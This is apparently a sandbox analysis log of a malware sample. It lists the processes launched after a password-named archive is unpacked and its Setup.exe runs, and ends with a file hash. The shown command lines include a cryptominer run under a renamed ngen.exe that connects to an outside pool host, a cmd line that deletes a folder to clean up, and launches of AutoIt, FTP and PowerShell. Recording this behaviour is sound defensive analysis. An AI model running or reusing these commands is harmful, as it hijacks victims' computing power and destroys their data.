C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6640 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6736 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\" -spe -an -ai#7zMap28562:138:7zEvent21301
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\" -spe -an -ai#7zMap26001:216:7zEvent25948
C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe
"C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Users\Admin\AppData\Local\Temp\coml.au3
C:\Users\Admin\AppData\Local\Temp\coml.au3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:2
C:\ProgramData\DGIJEGHDAE.exe
"C:\ProgramData\DGIJEGHDAE.exe"
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\ProgramData\HJJJECFIEC.exe
"C:\ProgramData\HJJJECFIEC.exe"
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HJDAKFBFBFBA" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"
Network
Files
| SHA512 | 9f03774d52a27fa55f01f17e5db0ac996a434cb8600119e09df58d6c2f941ab8fefd81791a005fd7cff1bfce3cf6c215047201700b9f71319514baa9606518cb |